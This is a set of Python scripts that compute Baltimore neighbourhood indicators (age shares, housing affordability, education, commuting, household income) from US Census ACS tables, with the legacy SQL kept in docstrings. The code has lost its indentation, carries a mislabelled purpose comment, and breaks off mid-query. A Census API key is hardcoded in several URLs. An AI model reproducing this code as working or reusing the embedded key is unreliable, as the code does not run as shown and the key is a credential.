#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B01001 - SEX BY AGE
# Universe: Total population
# Table Creates: tpop, female, male, age5 age18 age24 age64 age65
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def age18( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]-x[getColName(df, c2)] if x[getColName(df, c1)] != x[getColName(df, c2)] else None, axis=1) # None mirrors SQL nullif
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B01001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
# df.columns
total = df['B01001_001E_Total']
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
df1['five_to_17'] = ( df[ 'B01001_004E_Total_Male_5_to_9_years' ]
+ df[ 'B01001_005E_Total_Male_10_to_14_years' ]
+ df[ 'B01001_006E_Total_Male_15_to_17_years' ]
+ df[ 'B01001_028E_Total_Female_5_to_9_years' ]
+ df[ 'B01001_029E_Total_Female_10_to_14_years' ]
+ df[ 'B01001_030E_Total_Female_15_to_17_years' ]
) / total * 100
return df1['five_to_17']
# Cell
#File: age65.py
#Author: Charles Karpati
#Date: 4/16/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B01001 - SEX BY AGE
# Universe: Total population
# Table Creates: tpop, female, male, age5 age18 age24 age64 age65
#purpose:
#input: Year
#output:
import pandas as pd
import glob
def age65( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]-x[getColName(df, c2)] if x[getColName(df, c1)] != x[getColName(df, c2)] else None, axis=1) # None mirrors SQL nullif
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B01001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = df.sum(numeric_only=True)
# df.columns
total = df['B01001_001E_Total']
df1 = pd.DataFrame()
df1['CSA'] = df.index
df1.set_index('CSA', drop = True, inplace = True)
df1['sixtyfive_and_up'] = ( df[ 'B01001_020E_Total_Male_65_and_66_years' ]
+ df[ 'B01001_021E_Total_Male_67_to_69_years' ]
+ df[ 'B01001_022E_Total_Male_70_to_74_years' ]
+ df[ 'B01001_023E_Total_Male_75_to_79_years' ]
+ df[ 'B01001_024E_Total_Male_80_to_84_years' ]
+ df[ 'B01001_025E_Total_Male_85_years_and_over' ]
+ df[ 'B01001_044E_Total_Female_65_and_66_years' ]
+ df[ 'B01001_045E_Total_Female_67_to_69_years' ]
+ df[ 'B01001_046E_Total_Female_70_to_74_years' ]
+ df[ 'B01001_047E_Total_Female_75_to_79_years' ]
+ df[ 'B01001_048E_Total_Female_80_to_84_years' ]
+ df[ 'B01001_049E_Total_Female_85_years_and_over' ]
) / total * 100
return df1['sixtyfive_and_up']
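The five age-band functions above (age5, age18, age24, age64, age65) repeat the same pipeline and differ only in which B01001 columns they sum. A consolidated sketch could look like the following; `age_band_pct` is a hypothetical name, and `df` is assumed to already be grouped and summed by CSA as in the functions above:

```python
import pandas as pd

def age_band_pct(df, band_cols, total_col="B01001_001E_Total"):
    """Return each CSA's share (%) of the population falling in `band_cols`."""
    return df[band_cols].sum(axis=1) / df[total_col] * 100

# e.g. under_5 = age_band_pct(df, ['B01001_003E_Total_Male_Under_5_years',
#                                  'B01001_027E_Total_Female_Under_5_years'])
```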
# Cell
#File: affordm.py
#Author: Charles Karpati
#Date: 1/25/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B25091 - MORTGAGE STATUS BY SELECTED MONTHLY OWNER COSTS AS A PERCENTAGE OF HOUSEHOLD INCOME IN THE PAST 12 MONTHS
# Universe: Owner-occupied housing units
# Table Creates:
#purpose: Produce Housing and Community Development - Affordability Index - Mortgage Indicator
#input: Year
#output:
import pandas as pd
import glob
def affordm( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]-x[getColName(df, c2)] if x[getColName(df, c1)] != x[getColName(df, c2)] else None, axis=1) # None mirrors SQL nullif
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B25091*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B25091_008E','B25091_009E','B25091_010E','B25091_011E','B25091_002E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B25091_008E','B25091_009E','B25091_010E','B25091_011E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B25091_002E']
for col in columns:
denominators = addKey(df, denominators, col)
# Rows with a zero denominator are dropped later (mirrors the SQL nullif).
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# ( (value[1]+value[2]+value[3]+value[4]) / nullif(value[5],0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
WITH tbl AS (
select csa,
( (value[1]+value[2]+value[3]+value[4]) / nullif(value[5],0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B25091_008E','B25091_009E','B25091_010E','B25091_011E','B25091_002E'])
)
update vital_signs.data
set affordm = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: affordr.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B25070 - GROSS RENT AS A PERCENTAGE OF HOUSEHOLD INCOME IN THE PAST 12 MONTHS
# Universe: Renter-occupied housing units
#purpose: Produce Housing and Community Development - Affordability Index - Rent Indicator
#input: Year
#output:
import pandas as pd
import glob
def affordr( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]-x[getColName(df, c2)] if x[getColName(df, c1)] != x[getColName(df, c2)] else None, axis=1) # None mirrors SQL nullif
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B25070*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B25070_007E','B25070_008E','B25070_009E','B25070_010E','B25070_001E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B25070_007E','B25070_008E','B25070_009E','B25070_010E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B25070_001E']
for col in columns:
denominators = addKey(df, denominators, col)
# Rows with a zero denominator are dropped later (mirrors the SQL nullif).
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# ( (value[1]+value[2]+value[3]+value[4]) / nullif(value[5],0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
WITH tbl AS (
select csa,
( (value[1]+value[2]+value[3]+value[4]) / nullif(value[5],0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B25070_007E','B25070_008E','B25070_009E','B25070_010E','B25070_001E'])
)
update vital_signs.data
set affordr = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
"""
# Cell
#File: bahigher.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B06009 - PLACE OF BIRTH BY EDUCATIONAL ATTAINMENT IN THE UNITED STATES
#purpose: Produce Workforce and Economic Development - Percent Population (25 Years and over) with a Bachelor's Degree or Above
#Table Uses: B06009 - lesshs, hsdipl, bahigher
#input: Year
#output:
import pandas as pd
import glob
def bahigher( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]-x[getColName(df, c2)] if x[getColName(df, c1)] != x[getColName(df, c2)] else None, axis=1) # None mirrors SQL nullif
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B06009*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B06009_005E','B06009_006E','B06009_001E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B06009_005E','B06009_006E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B06009_001E']
for col in columns:
denominators = addKey(df, denominators, col)
# Rows with a zero denominator are dropped later (mirrors the SQL nullif).
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation + final mods
# ( ( value[1] + value[2] ) / nullif(value[3],0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.sum(axis=1)
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
return fi['final']
"""
/* <hsdipl_14> */ --
WITH tbl AS (
select csa,
( ( value[1] + value[2] ) / nullif(value[3],0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B06009_003E','B06009_004E','B06009_001E'])
)
update vital_signs.data
set hsdipl = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2014';
B06009_004E
label "Estimate!!Total!!Some college or associate's degree"
B06009_003E
label "Estimate!!Total!!High school graduate (includes equivalency)"
B06009_002E
label "Estimate!!Total!!Less than high school graduate"
B06009_001E
label "Estimate!!Total"
B06009_005E
label "Estimate!!Total!!Bachelor's degree"
B06009_006E
label "Estimate!!Total!!Graduate or professional degree"
"""
# Cell
#File: carpool.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B08101 - MEANS OF TRANSPORTATION TO WORK BY AGE
# Universe: Workers 16 Years and Over
# Table Creates: othrcom, drvalone, carpool, pubtran, walked
#purpose: Produce Sustainability - Percent of Population that Carpool to Work Indicator
#input: Year
#output:
import pandas as pd
import glob
def carpool( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]-x[getColName(df, c2)] if x[getColName(df, c1)] != x[getColName(df, c2)] else None, axis=1) # None mirrors SQL nullif
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B08101*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B08101_001E','B08101_049E','B08101_017E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B08101_017E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B08101_001E','B08101_049E']
for col in columns:
denominators = addKey(df, denominators, col)
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation + final mods
# ( value[3] / (value[1]-value[2]) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.iloc[: ,0] - denominators.iloc[: ,1]
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
#~~~~~~~~~~~~~~~
# Step 4)
# Add Special Baltimore City Data
#~~~~~~~~~~~~~~~
url = 'https://api.census.gov/data/20'+str(year)+'/acs/acs5/subject?get=NAME,S0801_C01_004E&for=county%3A510&in=state%3A24&key=829bf6f2e037372acbba32ba5731647c5127fdb0'
table = pd.read_json(url, orient='records')
fi['final']['Baltimore City'] = float(table.loc[1, table.columns[1]])
return fi['final']
"""
WITH tbl AS (
select csa,
( value[3] / nullif( (value[1]-value[2]) ,0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2013',ARRAY['B08101_001E','B08101_049E','B08101_017E'])
)
update vital_signs.data
set carpool = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2013';
"""
# Cell
#File: drvalone.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B08101 - MEANS OF TRANSPORTATION TO WORK BY AGE
# Universe: Workers 16 Years and Over
# Table Creates: othrcom, drvalone, carpool, pubtran, walked
#purpose: Produce Sustainability - Percent of Population that Drove Alone to Work Indicator
#input: Year
#output:
import pandas as pd
import glob
def drvalone( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]-x[getColName(df, c2)] if x[getColName(df, c1)] != x[getColName(df, c2)] else None, axis=1) # None mirrors SQL nullif
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B08101*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe
fi = pd.DataFrame()
columns = ['B08101_001E','B08101_049E','B08101_009E']
for col in columns:
fi = addKey(df, fi, col)
# Numerators
numerators = pd.DataFrame()
columns = ['B08101_009E']
for col in columns:
numerators = addKey(df, numerators, col)
# Denominators
denominators = pd.DataFrame()
columns = ['B08101_001E','B08101_049E']
for col in columns:
denominators = addKey(df, denominators, col)
# The denominator below is value[1] - value[2]; rows where it is 0 are dropped later (mirrors the SQL nullif).
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# ( value[3] / nullif((value[1]-value[2]),0) )*100
#~~~~~~~~~~~~~~~
fi['numerator'] = numerators.sum(axis=1)
fi['denominator'] = denominators.iloc[: ,0] - denominators.iloc[: ,1]
fi = fi[fi['denominator'] != 0] # Delete Rows where the 'denominator' column is 0
fi['final'] = (fi['numerator'] / fi['denominator'] ) * 100
#~~~~~~~~~~~~~~~
# Step 4)
# Add Special Baltimore City Data
#~~~~~~~~~~~~~~~
url = 'https://api.census.gov/data/20'+str(year)+'/acs/acs5/subject?get=NAME,S0801_C01_003E&for=county%3A510&in=state%3A24&key=829bf6f2e037372acbba32ba5731647c5127fdb0'
table = pd.read_json(url, orient='records')
fi['final']['Baltimore City'] = float(table.loc[1, table.columns[1]])
return fi['final']
"""
/* <drvalone_13> */ --
WITH tbl AS (
select csa,
( value[3] / nullif((value[1]-value[2]),0) )*100::numeric as result
from vital_signs.get_acs_vars_csa_and_bc('2013',ARRAY['B08101_001E','B08101_049E','B08101_009E'])
)
update vital_signs.data
set drvalone = result from tbl where data2.csa = tbl.csa and update_data_year = '2014' and data_year = '2013';
"""
# Cell
#File: hh25inc.py
#Author: Charles Karpati
#Date: 1/17/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B19001 - HOUSEHOLD INCOME V
# HOUSEHOLD INCOME IN THE PAST 12 MONTHS (IN 2017 INFLATION-ADJUSTED DOLLARS)
# Table Creates: hh25 hh40 hh60 hh75 hhm75, mhhi
#purpose: Produce Household Income Under 25K Indicator
#input: Year
#output:
import pandas as pd
import glob
def hh25inc( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]-x[getColName(df, c2)] if x[getColName(df, c1)] != x[getColName(df, c2)] else None, axis=1) # None mirrors SQL nullif
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B19001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
# Final Dataframe: pull columns 001-005 into a new frame by partial name match
fi = pd.DataFrame()
# append into that dataframe col 001
key = getColName(df, '001')
val = getColByName(df, '001')
fi[key] = val
# append into that dataframe col 002
key = getColName(df, '002')
val = getColByName(df, '002')
fi[key] = val
# append into that dataframe col 003
key = getColName(df, '003')
val = getColByName(df, '003')
fi[key] = val
# append into that dataframe col 004
key = getColName(df, '004')
val = getColByName(df, '004')
fi[key] = val
# append into that dataframe col 005
key = getColName(df, '005')
val = getColByName(df, '005')
fi[key] = val
# Delete Rows where the 'denominator' column is 0 -> like the Jail
fi = fi[fi[fi.columns[0]] != 0]
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
#~~~~~~~~~~~~~~~
return fi.apply(lambda x: ( ( x[fi.columns[1] ]+ x[fi.columns[2] ]+ x[fi.columns[3] ]+ x[fi.columns[4] ] ) / x[fi.columns[0]])*100, axis=1)
# Cell
#File: mhhi.py
#Author: Charles Karpati
#Date: 1/24/19
#Section: Bnia
#Email: karpati1@umbc.edu
#Description:
# Uses ACS Table B19001 - HOUSEHOLD INCOME IN THE PAST 12 MONTHS (IN 2016 INFLATION-ADJUSTED DOLLARS)
# Universe: Households
# Table Creates: hh25 hh40 hh60 hh75 hhm75, mhhi
#purpose: Produce Sustainability - Percent of Population that Walks to Work Indicator
#input: Year
#output:
import pandas as pd
import glob
def mhhi( year ):
def getColName (df, col): return df.columns[df.columns.str.contains(pat = col)][0]
def getColByName (df, col): return df[getColName(df, col)]
def addKey(df, fi, col):
key = getColName(df, col)
val = getColByName(df, col)
fi[key] = val
return fi
def nullIfEqual(df, c1, c2):
return df.apply(lambda x:
x[getColName(df, c1)]-x[getColName(df, c2)] if x[getColName(df, c1)] != x[getColName(df, c2)] else None, axis=1) # None mirrors SQL nullif
def sumInts(df): return df.sum(numeric_only=True)
#~~~~~~~~~~~~~~~
# Step 1)
# Fetch Tract Files w/CSA Labels by Name from the 2_cleaned folder.
#~~~~~~~~~~~~~~~
fileName = ''
for name in glob.glob('AcsDataClean/B19001*5y'+str(year)+'_est.csv'):
fileName = name
df = pd.read_csv( fileName, index_col=0 )
# Aggregate by CSA
# Group By CSA so that they may be operated on
df = df.groupby('CSA')
# Aggregate Numeric Values by Sum
df = sumInts(df)
# Add 'BALTIMORE' which is the SUM of all the CSAs
#~~~~~~~~~~~~~~~
# Step 2)
# Prepare the columns
#~~~~~~~~~~~~~~~
info = pd.DataFrame(
[
['B19001_002E', 0, 10000],
['B19001_003E', 10000, 4999 ],
['B19001_004E', 15000, 4999 ],
['B19001_005E', 20000, 4999 ],
['B19001_006E', 25000, 4999 ],
['B19001_007E', 30000, 4999],
['B19001_008E', 35000, 4999 ],
['B19001_009E', 40000, 4999 ],
['B19001_010E', 45000, 4999 ],
['B19001_011E', 50000, 9999 ],
['B19001_012E', 60000, 14999],
['B19001_013E', 75000, 24999 ],
['B19001_014E', 100000, 24999 ],
['B19001_015E', 125000, 24999 ],
['B19001_016E', 150000, 49000 ],
['B19001_017E', 200000, 1000000000000000000000000 ], # open-ended top bracket (SQL uses NULL); large sentinel keeps the arithmetic numeric
],
columns=['variable', 'lower', 'range']
)
# Final Dataframe
data_table = pd.DataFrame()
for index, row in info.iterrows():
#print(row['variable'], row['lower'], row['range'])
data_table = addKey(df, data_table, row['variable'])
# Create a table of the accumulating totals across the columns, left to right, for each CSA.
temp_table = data_table.cumsum(axis=1)
# Get the CSA midpoint by halving column index 16 (the last column) of the cumulative totals.
temp_table['midpoint'] = (temp_table.iloc[ : , -1 :] /2) # V3
temp_table['midpoint_index'] = False
temp_table['midpoint_index_value'] = False # Z3
temp_table['midpoint_index_lower'] = False # W3
temp_table['midpoint_index_range'] = False # X3
temp_table['midpoint_index_minus_one_cumulative_sum'] = False #Y3
# step 3 - csa_agg3: get the midpoint index by "when midpoint > agg[1] and midpoint <= agg[2] then 2"
# Get CSA Midpoint Index using the breakpoints in our info table.
# For each CSA
for index, row in temp_table.iterrows():
# Get the index of the first column where our midpoint is greater than the columns value.
# Do not use the temp columns (we just created)
midpoint = row['midpoint']
midpoint_index = 0
for column in row.iloc[:-6]:
# set midpoint index to the column with the highest value possible that is under midpoint
if( midpoint >= int(column) ):
# print (str(column) + ' - ' + str(midpoint))
temp_table.loc[ index, 'midpoint_index' ] = midpoint_index +1
midpoint_index += 1
temp_table = temp_table.drop('Unassigned--Jail')
for index, row in temp_table.iterrows():
temp_table.loc[ index, 'midpoint_index_value' ] = data_table.loc[ index, data_table.columns[row['midpoint_index']] ]
temp_table.loc[ index, 'midpoint_index_lower' ] = info.loc[ row['midpoint_index'] ]['lower']
temp_table.loc[ index, 'midpoint_index_range' ] = info.loc[ row['midpoint_index'] ]['range']
temp_table.loc[ index, 'midpoint_index_minus_one_cumulative_sum'] = row[ row['midpoint_index']-1 ]
#~~~~~~~~~~~~~~~
# Step 3)
# Run the Calculation
# Calculation = midpoint_lower + midpoint_range * ( (midpoint - midpoint_upto_agg) / nullif(midpoint_total, 0) )
# Calculation = W3 + X3 * ((V3 - Y3) / Z3)
# V3 -> midpoint of households == sum / 2
# W3 -> lower limit of the income range containing the median == row['lower']
# X3 -> width of the interval containing the median == row['range']
# Z3 -> number of households within the interval containing the median == row['total']
# Y3 -> cumulative frequency up to, but NOT including, the median interval
#~~~~~~~~~~~~~~~
temp_table['final'] = temp_table['midpoint_index_lower']+temp_table['midpoint_index_range']*((temp_table['midpoint']-temp_table['midpoint_index_minus_one_cumulative_sum'])/temp_table['midpoint_index_value'])
#~~~~~~~~~~~~~~~
# Step 4)
# Add Special Baltimore City Data
#~~~~~~~~~~~~~~~
url = 'https://api.census.gov/data/20'+str(year)+'/acs/acs5/subject?get=NAME,S1901_C01_012E&for=county%3A510&in=state%3A24&key=829bf6f2e037372acbba32ba5731647c5127fdb0'
table = pd.read_json(url, orient='records')
temp_table['final']['Baltimore City'] = float(table.loc[1, table.columns[1]])
return temp_table['final']
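The W3 + X3 * ((V3 - Y3) / Z3) step above is the standard grouped-data median: linear interpolation inside the bin that contains the midpoint. A minimal standalone sketch, assuming every bin has a nonzero count and using hypothetical bracket values:

```python
def grouped_median(counts, lowers, widths):
    """Median from binned counts via linear interpolation within the median bin."""
    midpoint = sum(counts) / 2                 # V3
    cum = 0
    for i, c in enumerate(counts):
        if cum + c >= midpoint:                # median falls inside bin i
            lower, width = lowers[i], widths[i]        # W3, X3
            below, in_bin = cum, c                     # Y3, Z3
            return lower + width * ((midpoint - below) / in_bin)
        cum += c

# e.g. grouped_median([10, 30, 10], [0, 10000, 15000], [10000, 4999, 4999])
```

With the example bins, the midpoint is 25 households, which falls in the second bin, giving 10000 + 4999 * (15/30) = 12499.5.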
"""
/* <mmhhi_14> */ --
with tbl_csa as (
select a.*,b.count from vital_signs.get_acs_vars_csa_and_bc('2014',ARRAY['B19001_002E','B19001_003E','B19001_004E','B19001_005E','B19001_006E','B19001_007E','B19001_008E','B19001_009E','B19001_010E','B19001_011E','B19001_012E','B19001_013E','B19001_014E','B19001_015E','B19001_016E','B19001_017E','B19013_001E'])
a left join (select csa,count(*) as count from vital_signs.tracts group by csa) b
on a.csa = b.csa
),
info as (
select 'B19001_002E' as variable, 0 as lower, 10000 as range
union all select 'B19001_003E' as variable, 10000 as lower, 4999 as range
union all select 'B19001_004E' as variable, 15000 as lower, 4999 as range
union all select 'B19001_005E' as variable, 20000 as lower, 4999 as range
union all select 'B19001_006E' as variable, 25000 as lower, 4999 as range
union all select 'B19001_007E' as variable, 30000 as lower, 4999 as range
union all select 'B19001_008E' as variable, 35000 as lower, 4999 as range
union all select 'B19001_009E' as variable, 40000 as lower, 4999 as range
union all select 'B19001_010E' as variable, 45000 as lower, 4999 as range
union all select 'B19001_011E' as variable, 50000 as lower, 9999 as range
union all select 'B19001_012E' as variable, 60000 as lower, 14999 as range
union all select 'B19001_013E' as variable, 75000 as lower, 24999 as range
union all select 'B19001_014E' as variable, 100000 as lower, 24999 as range
union all select 'B19001_015E' as variable, 125000 as lower, 24999 as range
union all select 'B19001_016E' as variable, 150000 as lower, 49999 as range
union all select 'B19001_017E' as variable, 200000 as lower, null as range
),
csa_agg as (
select csa,value as total,count,
ARRAY[
(value[1]),
(value[1] + value[2]),
(value[1] + value[2] + value[3]),
(value[1] + value[2] + value[3] + value[4]),
(value[1] + value[2] + value[3] + value[4] + value[5]),
(value[1] + value[2] + value[3] + value[4] + value[5] + value[6]),
(value[1] + value[2] + value[3] + value[4] + value[5] + value[6] + value[7]),
(value[1] + value[2] + value[3] + value[4] + value[5] + value[6] + value[7] + value[8]),
(value[1] + value[2] + value[3] + value[4] + value[5] + value[6] + value[7] + value[8] + value[9]),
(value[1] + value[2] + value[3] + value[4] + value[5] + value[6] + value[7] + value[8] + value[9] + value[10]),
(value[1] + value[2] + value[3] + value[4] + value[5] + value[6] + value[7] + value[8] + value[9] + value[10] + value[11]),
(value[1] + value[2] + value[3] + value[4] + value[5] + value[6] + value[7] + value[8] + value[9] + value[10] + value[11] + value[12]),
(value[1] + value[2] + value[3] + value[4] + value[5] + value[6] + value[7] + value[8] + value[9] + value[10] + value[11] + value[12] + value[13]),
